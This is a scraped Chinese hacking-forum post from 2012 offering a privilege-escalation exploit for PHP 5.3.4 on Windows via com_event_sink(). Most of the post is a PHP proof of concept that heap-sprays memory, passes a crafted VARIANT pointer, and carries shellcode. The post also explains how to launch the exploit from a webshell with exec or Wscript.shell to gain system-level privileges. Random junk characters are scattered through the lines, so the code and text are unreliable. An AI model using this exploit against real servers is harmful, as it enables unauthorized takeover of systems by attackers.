找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2263|回复: 0
打印 上一主题 下一主题

PHP 5.3.4(WIN) COM_SINK权限提升漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:08:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
  X8 I0 r$ d" M& f" Z
' ]: B) `1 }: e% }0 `测试方法如下:cmd /c x:\php\php.exe x:\test.php
. p4 Z3 L, T% h+ B
0 B' D" o5 L* u, \+ @下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php: r- ]9 _. W3 W
这里是两个测试的截图:  h6 D7 W7 u2 W, z( @% q
  G3 G- q+ t. p* `& ?! e

% q; Q; d; ^( E5 Z3 ]& V9 t, T
: U) q* v$ g4 C" `& [" r) }. S- _

& S: h: c8 M! `成功利用此漏洞的攻击者将获得系统的最高权限
* s  D1 N2 {, a$ K( N: w/ ^0 i) U7 O' A$ N& w$ b5 b7 R, l! F4 }  X
$ {! c+ J; V2 d, Q

! f) Z4 ]9 W# D0 ]0 d/ W3 @# z5 i  E

4 i9 `; f6 ?- x2 ~4 Q$ k关于漏洞分析稍后附上。一下是PoC代码:3 p" j$ n1 y6 R  u& u
; i* i2 d0 q# c& B5 `, f/ Y
<?php
- Z2 \5 B4 }2 p- ^& t5 y  V, ~//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞9 X5 ]3 y4 g8 v# k3 c; ?2 ]
//$eip ="\x44\x43\x42\x41";
6 T% r* M: @; e, U$eip= "\x4b\xe8\x57\x78";1 f) w5 E; J, q( F
$eax ="\x80\x01\x8d\x04";- \- W4 w* }5 f6 Z0 U# C
$deodrant="";9 `1 x6 ]2 K! z. G% i1 R+ T
$axespray = str_repeat($eip.$eax,0x80);
4 k' Y( V: z5 t( v# Z//048d0190
7 }* s% X" x# f( w. r" necho strlen($axespray);* L- J: H. d8 ~5 ~1 H. p) J1 m
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";& _; V3 e3 y1 ]  m" @, y  ]. X
echo "Silic Group Hacker Army - BlackBap.Org";0 P+ x7 ~7 m' L# I4 R- n- ?5 K8 b0 X
//19200 ==4B32 4b00  o9 @6 K3 Q$ @
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
& }0 r. E9 C9 _: }$terminate = "T";
" K, N  [) X! F* ?$u[] =$deodrant;
# H5 _* W2 L* p) i0 s$ b5 q5 L0 C$r[] =$deodrant.$terminate;# M3 b, v( D& P! Z; V$ p
$a[] =$deodrant.$terminate;" _& ?+ K% o9 a9 l
$s[] =$deodrant.$terminate;, q) y+ a* B6 Q+ ]9 a" g; f. e! n
//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的
' u7 E! W9 v. w$vVar = new VARIANT(0x048d0000+180);5 j9 x; e8 s" m" G( ?1 [( G; \
//弹窗代码(Shellcode)( b7 J6 h$ C2 l7 `
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
, U8 n' X2 w3 l# S: W4 E3 [$var2 = new VARIANT(0x41414242);
3 P7 l* `% X  Qcom_event_sink($vVar,$var2,$buffer);
$ k/ ?- l7 F! y* X, E?>2 N2 r. ?" k/ I, {

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表